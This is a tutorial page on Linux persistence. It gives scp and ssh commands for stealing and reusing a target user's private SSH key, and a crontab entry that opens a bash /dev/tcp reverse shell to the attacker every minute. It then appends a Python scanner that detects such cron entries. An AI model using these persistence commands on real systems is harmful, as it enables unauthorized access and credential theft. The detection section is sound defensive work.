🧙 Linux Persistence

Persistence Via SSH Keys

  • Linux is typically deployed as a server operating system and as a result, Linux servers are typically accessed remotely via services/protocols such as SSH.

  • If SSH is enabled and running on a Linux system you have compromised, you can take advantage of the SSH configuration to establish persistent access on the target system.

  • In most cases Linux servers will have key-based authentication enabled for the SSH service, allowing users to access the Linux system remotely without the need for a password.

  • After gaining access to a Linux system, we can transfer the SSH private key of a specific user account to our system and use that SSH private key for all future authentication and access.

Copying the id_rsa (Private SSH Key) from Target System to Local System

To retrieve the id_rsa (private SSH key) from the target system to your local system, use the following scp command:

scp <user>@<ip>:<path_to_id_rsa> <path_to_put>

This command copies the private key from the target system to your local system. Make sure to set the correct paths.

Setting Permissions for id_rsa

To set the appropriate permissions for id_rsa, use the following command:

chmod 400 id_rsa

This command restricts the file permissions on id_rsa to ensure it is only readable by the owner.

Logging into the Target System using the Private Key

To log in to the target system using the private key, use the following command:

ssh -i id_rsa <user>@<ip>

This command establishes an SSH connection to the target system, authenticating using the provided private key. Ensure you replace <user> and <ip> with the correct values.

Persistence Via Cron Jobs

  • Linux implements task scheduling through a utility called Cron. Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.

  • An application or script that has been configured to run repeatedly with Cron is known as a Cron job.

  • We can use cron jobs to execute a command or script at a fixed interval to ensure we have persistent access to the target system.

Setting Up a Cron Job for Maintaining Access

To create a cron job on the target Linux system that establishes a connection to your local system every minute, follow these steps:

  1. Create a file named "cron" containing the desired cron job entry:

    echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'" > cron

  2. Install the cron job by loading the file as the user's crontab (this replaces any existing crontab for that user):

    crontab cron

Important Note

After setting up the cron job, ensure you have a listener set up on your local system. This way, every minute, the target system will attempt to connect to your local system, allowing you to maintain access.
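A defender-side check for the cron technique above, added here as an example and not part of the original page: it parses crontab text (including @reboot-style shortcuts, which goes beyond the single entry shown above) and flags entries whose command carries the /dev/tcp reverse-shell idiom or whose schedule fires every minute. The crontab text, the address 203.0.113.5 and the file paths are constructed for the example.

```python
import re

# Constructed sample crontab (not captured from a real host): a nightly backup,
# a benign every-minute health check, and an entry shaped like the /dev/tcp
# reverse shell described above. 203.0.113.5 is a documentation-range address.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# nightly backup
0 2 * * * /usr/local/bin/backup.sh --quiet
* * * * * /usr/local/bin/health-check
*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
"""

# Command-text signatures for the reverse-shell idiom used on this page.
SUSPICIOUS = [(r"/dev/tcp/", "bash /dev/tcp network redirection"),
              (r"\bbash\s+-i\b", "interactive shell launched from a scheduled job")]

def parse_entry(line):
    """Return (schedule, command) for a job line; None for blanks, comments, VAR=value."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^\w+=", s):
        return None
    if s.startswith("@"):                      # @reboot, @hourly, ... shortcuts
        parts = s.split(None, 1)
        return tuple(parts) if len(parts) == 2 else None
    parts = s.split(None, 5)                   # five time fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def scan_crontab(text):
    """Return one dict per flagged entry; "high" severity needs a command match, not just cadence."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, command)]
        severity = "high" if reasons else "low"
        if schedule.split()[0] in ("*", "*/1"):
            reasons.append("runs every minute (beaconing cadence)")
        if reasons:
            findings.append({"line": n, "schedule": schedule, "command": command,
                             "severity": severity, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"[{f['severity']}] line {f['line']}: {f['command']}")
        print("    " + "; ".join(f["reasons"]))
```

Feed it the output of `crontab -l` for each user, or the files in the per-user crontab spool and /etc/cron.d, to review scheduled jobs on a host; the every-minute health check shows why cadence alone only rates "low".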
